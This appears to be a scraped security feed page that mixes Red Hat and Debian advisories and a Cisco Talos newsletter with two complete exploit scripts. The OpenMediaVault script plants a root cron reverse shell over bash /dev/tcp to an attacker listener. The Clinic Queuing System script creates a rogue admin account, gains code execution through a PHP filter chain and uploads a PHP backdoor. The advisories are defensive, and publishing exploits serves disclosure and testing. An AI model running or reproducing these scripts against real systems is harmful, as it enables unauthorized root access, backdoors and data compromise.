Red Hat Security Advisory 2024-2671-03 - Red Hat build of MicroShift release 4.14.24 is now available with updates to packages and images that fix several bugs. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2671.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat build of MicroShift 4.14.24 security update  
Advisory ID:        RHSA-2024:2671-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:2671  
Issue date:         2024-05-09  
Revision:           03  
CVE Names:          CVE-2023-45288  
====================================================================

Summary: 

Red Hat build of MicroShift release 4.14.24 is now available with updates  
to packages and images that fix several bugs.

This release includes a security update for Red Hat build of MicroShift 4.14.24.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

Description:

Red Hat build of MicroShift is Red Hat's light-weight Kubernetes  
orchestration solution designed for edge device deployments and is built  
from the edge capabilities of Red Hat OpenShift. MicroShift is an  
application that is deployed on top of Red Hat Enterprise Linux devices at  
the edge, providing an efficient way to operate single-node clusters in  
these low-resource environments.

This advisory contains the RPM packages for Red Hat build of MicroShift  
4.14.24. Read the following advisory for the container images for this  
release:

https://access.redhat.com/errata/RHSA-2024:2668

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

Security Fix(es):

* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames  
causes DoS (CVE-2023-45288)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All of the bug fixes may not be documented in this advisory. Read the  
following release notes documentation for details about these changes:

https://access.redhat.com/documentation/en-us/red_hat_build_of_microshift/4.14/html/release_notes/index

All Red Hat build of MicroShift 4.14 users are advised to use these updated  
packages and images when they are available in the RPM repository.

Solution:

https://access.redhat.com/documentation/en-us/red_hat_build_of_microshift/4.14/html/release_notes/index

CVEs:

CVE-2023-45288

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2268273

Red Hat Security Advisory 2024-2671-03

Red Hat Security Advisory 2024-2667-03 - Red Hat build of MicroShift release 4.15.12 is now available with updates to packages and images that include a security update.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2667.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat build of MicroShift 4.15.12 security updateAdvisory ID:        RHSA-2024:2667-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2667Issue date:         2024-05-09Revision:           03CVE Names:          CVE-2023-45288====================================================================Summary: Red Hat build of MicroShift release 4.15.12 is now available with updates to packages and images that include a security update.Red Hat Product Security has rated this update as having a security impactof Important. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for each vulnerabilityfrom the CVE link(s) in the References section.Description:Red Hat build of MicroShift is Red Hat's light-weight Kubernetes orchestration solution designed for edge device deployments and is built from the edge capabilities of Red Hat OpenShift. MicroShift is an application that is deployed on top of Red Hat Enterprise Linux devices at the edge, providing an efficient way to operate single-node clusters in these low-resource environments.This advisory contains the RPM packages for Red Hat build of MicroShift 4.15.12. Read the following advisory for the container images for this release:https://access.redhat.com/errata/RHSA-2024:2664For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.Solution:https://access.redhat.com/documentation/en-us/red_hat_build_of_microshift/4.15/html/release_notes/indexCVEs:CVE-2023-45288References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2268273

Red Hat Security Advisory 2024-2667-03

Under a pilot program, CISA has sent out more than 2,000 alerts to registered organizations regarding the existence of any unpatched vulnerabilities in CISA’s KEV catalog.

Thursday, May 9, 2024 14:00

One of the great cybersecurity challenges organizations currently face, especially smaller ones, is that they don’t know what they don’t know. 

It’s tough to have your eyes on everything all the time, especially with so many pieces of software running and IoT devices extending the reach of networks broader than ever.  

One potential (and free!) solution seems to be a new program from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) that alerts companies and organizations of unpatched vulnerabilities that attackers could exploit.  

Under a pilot program that’s been running since January 2023, CISA has sent out more than 2,000 alerts to registered organizations regarding the existence of any unpatched vulnerabilities in CISA’s Known Exploited Vulnerabilities (KEV) catalog. For those that don’t know, the KEV catalog consists of any security issues that threat actors are known to actively exploit in the wild, and often include some of the most serious vulnerabilities disclosed on a regular basis, some of which have been around for years. 

Jen Easterly, CISA’s director, said last month that 49 percent of those vulnerabilities that CISA sent alerts about were mitigated — either through patching or other means. The program will launch in earnest later this year, but more than 7,000 organizations have already registered for the pilot program. 

Everything about this makes sense to me — it comes at no cost to the consumer or business, it allows the government to inform organizations of something they very likely aren’t aware of, and these issues are easy enough to fix with software or hardware patches.  

I’m mainly wondering how we’ll get more potential targets to sign up for this program and receive these alerts. 

According to CISA’s web page on the program, the alerts are only currently available to “Federal, state, local, tribal and territorial governments, as well as public and private sector critical infrastructure organizations.” 

I would imagine that, at some point, the scope of this will be expanded if it continues to be successful, and there are no clear guidelines for what “critical infrastructure” means in this context, exactly. (For example, would something like a regional ISP would be eligible for this program? I’d consider this CI, but I’m not sure the federal government would.) 

Currently, signing up for the alerts seems to be as simple as sending an email. CISA’s also been sending alerts to any vulnerable systems that appear on Shodan scans. I don’t think there’s a way to make something like this compulsory unless it’s codified into law somewhere, but it almost seems like it should be. 

Who wouldn’t want to just get free alerts from the federal government telling you when your network has a vulnerability that’s being exploited in the wild? For many of the local and state government teams, the pilot program targets are understaffed and underfunded, and sometimes the act of patching can get so overwhelming that it can take months to keep current. But this type of organization may also be stretched thin to the point they haven’t even heard of this program from CISA. So if the most I can do is shout out this government program in this newsletter and one extra company signs up, I’ll feel good about that.  

**The one big thing **

Cisco Talos’ Vulnerability Research team recently disclosed three zero-day vulnerabilities two of which are still unpatched as of Wednesday, May 8. Two vulnerabilities in this group — one in the Tinyroxy HTTP proxy daemon and another in the stb\_vorbis.c file library — could lead to arbitrary code execution, earning both issues a CVSS score of 9.8 out of 10. While we were unable to reach the maintainers, the Tinyproxy maintainers have since patched the issue. Another zero-day exists in the Milesight UR32L wireless router. These vulnerabilities have all been disclosed in adherence to Cisco’s third-party vulnerability disclosure timeline after the associated vendors did not meet the 90-day deadline for a patch or communication.   

**Why do I care? **

Tinyproxy is meant to be used in smaller networking environments. It was originally released more than a dozen years ago. A use-after-free vulnerability, TALOS-2023-1889 (CVE-2023-49606), exists in the \`Connection\` header provided by the client. An adversary could make an unauthenticated HTTP request to trigger this vulnerability, setting off the reuse of previously freed memory, which leads to memory corruption and could lead to remote code execution. Four of these issues that Talos disclosed this week still do not have patches available, so anyone using affected software should find other potential mitigations. 

**So now what? **

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

**Top security headlines of the week **

**Several international law enforcement agencies have identified, sanctioned and indicted the alleged leader of the LockBit ransomware group.** Russian national Dmitry Yuryevich Khoroshev has been unmasked as the person behind the operator of the username “LockBitSupp,” LockBit’s creator and mastermind. The ransomware group has extorted an estimated $500 million from its victims over its several years of activity. Khoroshev allegedly took 20 percent of each ransom payment and operated the group’s data leak site. The U.S. federal government is offering up to a $10 million reward for anyone who can provide information leading to Khoroshev’s arrest. In all, he is charged with 26 crimes in the U.S. that carry a maximum punishment of 185 years in prison. LockBit, founded around 2018, operates under the ransomware-as-service model in which other actors can pay to access LockBit’s malware and infection tools. The group has been linked to several major ransomware attacks over the years, including against the U.K.’s Royal Mail service, a small Canadian town in Ontario and a children’s hospital in Chicago. (Wired, The Verge) 

**The U.K. blamed Chinese state-sponsored actors for a recent data breach at a military contractor that led to the theft of personal information belonging to around 270,000 members of the British armed forces.** Potentially affected information includes names and banking information for full-time military personnel and part-time reservists, as well as veterans who left the military after January 2018. Some of those affected are also current members of parliament. A top official at the U.K.’s Ministry of Defense called the breach a “very significant matter” and that the contractor immediately took the affected systems offline. While the British government has yet to formally attribute the attack to a specific threat actor, several reports indicate they believe an actor emanating from China was responsible. While the actors may have been present on the network for up to weeks, there is currently no evidence that the information was copied or removed. (The Guardian, Financial Times) 

**Security researchers found a new attack vector that could allow bad actors to completely negate the effect of VPNs.** The method, called “TunnelVision,” can force VPN services to send or receive some or all traffic outside of the encrypted tunnel they create. Traditionally users will rely on VPNs to protect their traffic from snooping or tampering, or to hide their physical locations. The researchers believe TunnelVision affects every VPN application available if it connects to an attacker-controlled network. There is currently no way to avoid or bypass these attacks unless the VPN runs on Linux or Android. TunnelVision has been possible since at least 2002, though it's unclear how often it's been used in the wild. VPN users who are concerned about this attack can run their VPN inside a virtual machine whose network adapter isn’t in bridged mode or connect via the Wi-Fi network of a cellular device. However, for the attack to be effective, the attacker would need complete control over a network. If a connection is affected, though, the user would be completely unaware, and the VPN would not alert them to a change. (Ars Technica, ZDNet) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #182: 4 takeaways from what Talos IR is seeing in the field 
*   ClamAV 1.4.0 release candidate now available! 
*   Critical Tinyproxy Flaw Opens Over 50,000 Hosts to Remote Code Execution 
*   Vulnerabilities in employee management system could lead to remote code execution, login credential theft 

**Upcoming events where you can find Talos **

**ISC2 SECURE Europe** **(May 29)** 

_Amsterdam, Netherlands_ 

> _Gergana Karadzhova-Dangela from Cisco Talos Incident Response will participate in a panel on “Using ECSF to Reduce the Cybersecurity Workforce and Skills Gap in the EU.” Karadzhova-Dangela participated in the creation of the EU cybersecurity framework, and will discuss how Cisco has used it for several of its internal initiatives as a way to recruit and hire new talent._  

**Cisco Live** **(June 2 - 6)** 

_Las Vegas, Nevada_  

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0    
**MD5:** 8c69830a50fb85d8a794fa46643493b2    
**Typical Filename:** AAct.exe    
**Claimed Product:** N/A     
**Detection Name:** W32.File.MalParent 

**SHA 256:** d529b406724e4db3defbaf15fcd216e66b9c999831e0b1f0c82899f7f8ef6ee1   
**MD5:** fb9e0617489f517dc47452e204572b4e   
**Typical Filename:** KMSAuto++.exe   
**Claimed Product:** KMSAuto++   
**Detection Name:** W32.File.MalParent 

**SHA 256:** abaa1b89dca9655410f61d64de25990972db95d28738fc93bb7a8a69b347a6a6   
**MD5:** 22ae85259273bc4ea419584293eda886   
**Typical Filename:** KMSAuto++ x64.exe   
**Claimed Product:** KMSAuto++   
**Detection Name:** W32.File.MalParent 

**SHA 256:** 8664e2f59077c58ac12e747da09d2810fd5ca611f56c0c900578bf750cab56b7    
**MD5:** 0e4c49327e3be816022a233f844a5731    
**Typical Filename:** aact.exe    
**Claimed Product:** AAct x86    
**Detection Name:** PUA.Win.Tool.Kmsauto::in03.talos 

**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa     
**MD5:** df11b3105df8d7c70e7b501e210e3cc3     
**Typical Filename:** DOC001.exe     
**Claimed Product:** N/A     
**Detection Name:** Win.Worm.Coinminer::1201

A new alert system from CISA seems to be effective — now we just need companies to sign up

Openmediavault versions prior to 7.0.32 have a vulnerability that occurs when users in the web-admin group enter commands on the crontab by selecting the root shell. As a result of exploiting the vulnerability, authenticated web-admin users can run commands with root privileges and receive reverse shell connections.

    # Exploit Title: Openmediavault < 7.0.32 Authenticated RCE & Local Privilege Escalation# Date: 08.05.2024# Exploit Author: Mert BENADAM# Vendor Homepage: https://www.openmediavault.org/# Software Link: https://sourceforge.net/projects/openmediavault/# Version: < 7.0.32# Tested on: OMV 7.0.32 & 6.5 @Virtual Machine# Description: OpenMediaVault is the next generation network attached storage (NAS) solution based on Debian Linux.# Special Thx: k3yZ :)"""PoC:This vulnerability occurs when users in the web-admin group enter commands on the crontab by selecting the root shell.As a result of exploiting the vulnerability,authenticated web-admin users can run commands with root privileges and receive reverse shell connections.It can also be used in privilege escalation attacks on local systems."""import argparseimport requestsimport jsondef login(ip_address, username, password, lhost, lport):    try:        login_data = {            "service": "Session",            "method": "login",            "params": {                "username": username,                "password": password            },            "options": None        }        url = f"http://{ip_address}/rpc.php"        response = requests.post(url, json=login_data)        if response.status_code == 200:            print("Login Success , Checking User Privilages...")            post_check(ip_address, response.cookies, lhost , lport)        else:            print("login Failed, Probably Wrong User Credentials...")            print("Reason:")            print(response.json())    except requests.exceptions.ConnectionError:        print("Connection Error: Could Not Connect To The Server...")    except Exception as e:        print("Unexpected Error:", e)def post_check(ip_address, cookies, lhost, lport):    try:        post_data = {            "service": "Cron",            "method": "getList",            "params": {                "type": ["userdefined"],                "start": 0,                "limit": -1            },            "options": None        }        url = f"http://{ip_address}/rpc.php"        response = requests.post(url, json=post_data, cookies=cookies)        if response.status_code == 200:            print("Accesing Crons...OK")            send_post(ip_address, cookies, lhost , lport)        elif response.status_code == 403:            print("Kullanıcı yetkili değil.")        else:            print("Post Request Failure...")    except requests.exceptions.ConnectionError:        print("Connection Error: Could Not Connect To The Server...")    except Exception as e:        print("Beklenmeyen bir hata oluştu:", e)def send_post(ip_address, cookies, lhost , lport):    try:        post_data = {            "service": "Cron",            "method": "set",            "params": {                "uuid": "fa4b1c66-ef79-11e5-87a0-0002b3a176b4",  # UUID                "enable": True,                "execution": "exactly",                "minute": ["*"],                "everynminute": False,                "hour": ["*"],                "everynhour": False,                "dayofmonth": ["*"],                "everyndayofmonth": False,                "month": ["*"],                "dayofweek": ["*"],                "username": "root",                "command": f"bash -c 'exec bash -i &>/dev/tcp/{lhost}/{lport} <&1'",  # Command From User                "sendemail": False,                "comment": "",                "type": "userdefined"            },            "options": None        }        url = f"http://{ip_address}/rpc.php"        response = requests.post(url, json=post_data, cookies=cookies)        if response.status_code == 200:            print("Payload Sent... OK,")            update(ip_address, cookies)        elif response.status_code == 403:            print("User Not Authrorized.")        else:            print("Something Wrong.CHECK your version...")    except requests.exceptions.ConnectionError:        print("Connection Error: Could Not Connect To The Server...")    except Exception as e:        print("Unexpected Error:", e)def update(ip_address, cookies):    try:        post_data = {            "service": "Config",            "method": "applyChangesBg",            "params": {                "modules": [],                "force": False            },            "options": None        }        url = f"http://{ip_address}/rpc.php"        response = requests.post(url, json=post_data, cookies=cookies)        if response.status_code == 200:            print("Updating crontabs...")            print("Successfully Exploited...")            print("Exploited Shell Will Be Triggered In 1 Minute, Check Your Listener...")            print("Warning: Make sure You Open a listener And Enter Correct IP-PORT Information...")        elif response.status_code == 403:            print("User Not Authrorized.")        else:            print("Someting Wrong. Check version...")    except requests.exceptions.ConnectionError:        print("Connection Error: Could Not Connect To The Server...")    except Exception as e:        print("Unexpected Error:", e)def main():    font="""███╗   ██╗ ██████╗ ███╗   ███╗███████╗██████╗  ██████╗██╗   ██╗ ██████╗  ██████╗████╗  ██║██╔═══██╗████╗ ████║██╔════╝██╔══██╗██╔════╝╚██╗ ██╔╝██╔═████╗██╔═████╗██╔██╗ ██║██║   ██║██╔████╔██║█████╗  ██████╔╝██║      ╚████╔╝ ██║██╔██║██║██╔██║██║╚██╗██║██║   ██║██║╚██╔╝██║██╔══╝  ██╔══██╗██║       ╚██╔╝  ████╔╝██║████╔╝██║██║ ╚████║╚██████╔╝██║ ╚═╝ ██║███████╗██║  ██║╚██████╗   ██║   ╚██████╔╝╚██████╔╝╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝   ╚═╝    ╚═════╝  ╚═════╝    """    parser = argparse.ArgumentParser(description="OpenMediaVault 7.0.32 > 6.5.0 RCE And Local Privilage Escalation")    parser.add_argument("-U", "--ip", type=str, help="Victim Ip Adress", required=False)    parser.add_argument("-u", "--username", type=str, help="Username For Web Admin", required=False)    parser.add_argument("-p", "--password", type=str, help="Password For Web Admin", required=False)    parser.add_argument("-L", "--lhost", type=str, help="Listener IP Adress For Reverse Shell", required=False)    parser.add_argument("-P", "--lport", type=str, help="Listener Port For Reverse Shell", required=False)    args = parser.parse_args()    if args.ip and args.username and args.password and args.lhost and args.lport:        print(font)        login(args.ip, args.username, args.password, args.lhost , args.lport)    else:        print(font)        parser.print_help()if __name__ == "__main__":    main()

Openmediavault Remote Code Execution / Local Privilege Escalation

Clinic Queuing System version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: Clinic Queuing System 1.0 RCE # Date: 2024/1/7# Exploit Author: Juan Marco Sanchez# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html# Version: 1.0# Tested on: Debian Linux Apache Web Server# CVE: CVE-2024-0264 and CVE-2024-0265import requestsimport randomimport argparsefrom bs4 import BeautifulSoupparser = argparse.ArgumentParser()parser.add_argument("target")args = parser.parse_args()base_url = args.targetphase1_url = base_url + '/LoginRegistration.php?a=save_user'phase2_url = base_url + '/LoginRegistration.php?a=login'filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=home"def phase1(): # CVE-2024-0264  rand_user = 'pwn_'+str(random.randint(100, 313))  rand_pass = 'pwn_'+str(random.randint(100, 313))  pwn_user_data = {'formToken':'','fullname':'pwn!','username':rand_user,'password':rand_pass,'status':1,'type':1}  print("[*] adding administrator " + rand_user + ":" + rand_pass)  phase1 = requests.post(phase1_url, pwn_user_data)  if "User Account has been added successfully." in phase1.text:    print("[+] Phase 1 Success - Admin user added!\n")    print("[*] Initiating Phase 2")    phase2(rand_user, rand_pass)  else:    print("[X] user creation failed :(")    die()def phase2(user, password): # CVE-2024-0265  s = requests.Session();  login_data = {'formToken':'','username':user, 'password':password}  print("[*] Loggin in....")  phase2 = s.post(phase2_url, login_data)  if "Login successfully." in phase2.text:    print("[+] Login success")  else:    print("[X] Login failed.")    die()  print("[+] Preparing for RCE via LFI PHP FIlter Chaining...\n")  rce_url = base_url + "/?page=" + filter_chain + "&0=echo '|jmrcsnchz|<pre>'.shell_exec('id').'</pre>';"  #print("[*] Payload: " + rce_url)  rce = s.get(rce_url)    if "jmrcsnchz" in rce.text:    print("[+] RCE success!")    soup = BeautifulSoup(rce.text, 'html.parser')    print("[+] Output of id: " + soup.pre.get_text())    print("[*] Uploading php backdoor....")    s.get(base_url + "/?page=" + filter_chain + "&0=file_put_contents('rce.php',base64_decode('PD89YCRfR0VUWzBdYD8%2b'));")    print("[+] Access at " + base_url + "/rce.php?0=whoami")  else:    print("[X] Exploit failed. Try debugging the script or pass this script onto a proxy to investigate.")    die()try:  print("[*] Initiating Phase 1")  phase1()except:  print("Exploit failed.")

Clinic Queuing System 1.0 Remote Code Execution

Debian Linux Security Advisory 5686-1 - Nick Galloway discovered an integer overflow in dav1d, a fast and small AV1 video stream decoder which could result in memory corruption.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5686-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 09, 2024                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : dav1dCVE ID         : CVE-2024-1580Nick Galloway discovered an integer overflow in dav1d, a fast and smallAV1 video stream decoder which could result in memory corruption.For the oldstable distribution (bullseye), this problem has been fixedin version 0.7.1-3+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.0.0-2+deb12u1.We recommend that you upgrade your dav1d packages.For the detailed security status of dav1d please refer toits security tracker page at:https://security-tracker.debian.org/tracker/dav1dFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmY84YwACgkQEMKTtsN8TjbRiRAAvuyxl16M5vv5sRP7cBXJOG1AXtEAmw7uId5GNiRIrIPPs9JuP8fPBqxH+tasEIF7Il88KgSKDt+ZYa2R3iG57KQNjTxCvZ5XZ9rlOhb1C1Z69Qm7beYXFpTasygIteKYzvrW3qvcDvmqsYuLd8ZDIPFhLeb5XbBdm2a+vE1dhvdyYwMj+MZP2Sq7ZwCEd/ez6pKhsrZZjOWcoDeH/64CBnpNy/tpXW1KDvS0TsfWdlJbvG+3USBNaGq9rk+jc1XKcKlYmPV4VKxrlUvuWFGv+s99pPNGWhE8Xf84DlssGj2Hi+m6QUHSfqxBtf+YiArHjLPihgW8CGnNZ7vJBAjUO26pwwxZcx6AemsjyJAynqcd9c38SDDwvTZuka+mhJwZbrVcJqe5NU2jmrbzV6RpJtTzmCeZwuvSlmUxH36p9fVYhEIaeflaRtIidDnnVo2ervwAKPDfVnIt+X6bHnF6m+GGIw8I1+6RhNulUQhwivNtbGXhp/9vf3e1TmDr0awyY2yG7v2Qv1SSzQGQA4W5ARMb/DliFFZTpvRDzEp1iuVyduPO0y8bWORNhIsAjirq1DhzHBxquZY4tHBi3AfoVGO09Yh3ZE/KyMP/98P5XU3gH4xLsz3PziHH15GWSpxkcjgFblNOYdtYrp4K+8YC0fB7cuKEIWaHRO5CCgx/UHsYhW-----END PGP SIGNATURE-----

Debian Security Advisory 5686-1

Debian Linux Security Advisory 5684-1 - The following vulnerabilities have been discovered in the WebKitGTK web engine. Kacper Kwapisz discovered that visiting a malicious website may lead to address bar spoofing. Nan Wang and Rushikesh Nandedkar discovered that processing maliciously crafted web content may lead to arbitrary code execution. SungKwon Lee discovered that processing web content may lead to a denial-of-service. Various other issues were also addressed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5684-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
May 09, 2024                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-42843 CVE-2023-42950 CVE-2023-42956 CVE-2024-23252  
                 CVE-2024-23254 CVE-2024-23263 CVE-2024-23280 CVE-2024-23284

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-42843

    Kacper Kwapisz discovered that visiting a malicious website may  
    lead to address bar spoofing.

CVE-2023-42950

    Nan Wang and Rushikesh Nandedkar discovered that processing  
    maliciously crafted web content may lead to arbitrary code  
    execution.

CVE-2023-42956

    SungKwon Lee discovered that processing web content may lead to a  
    denial-of-service.

CVE-2024-23252

    anbu1024 discovered that processing web content may lead to a  
    denial-of-service.

CVE-2024-23254

    James Lee discovered that a malicious website may exfiltrate audio  
    data cross-origin.

CVE-2024-23263

    Johan Carlsson discovered that processing maliciously crafted web  
    content may prevent Content Security Policy from being enforced.

CVE-2024-23280

    An anonymous researcher discovered that a maliciously crafted  
    webpage may be able to fingerprint the user.

CVE-2024-23284

    Georg Felber and Marco Squarcina discovered that processing  
    maliciously crafted web content may prevent Content Security  
    Policy from being enforced.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.44.1-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.44.1-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmY8e60ACgkQAAyEYu0C  
2ALK/g/7BzT5OfeZ1/2nK7TVdiyOjPuQgoZBqIV1LAmUBy5gHvKjOtrujqI9pVaU  
DZtGhgfRwu2AZjAvR1A5gCNTwWyGhvFrLN23/BaloxcveYr6iY6HuYFymlQp24fM  
o35x8DQJySgO3cGmNR1GwwLatr3dVrHh+Kot1J449G4mqlQxH4UQ8ytWOSfpWLdZ  
3ndArvVrO35eBUgPbUEooPHITSlusZQPbaVJkmU69zbpW1z220sQldSmObWHbAGG  
41NHl74LMqe64tI5EfrgSwdY7L+FEby/M0JlO37e1Hut0WpQckHuNgrlq6IO20Ed  
h80kmkN91TDCihQ1vovZaTbg9bCYcSYCWBxPGomip1v8EL1AybO8c7pEI/v/lcVO  
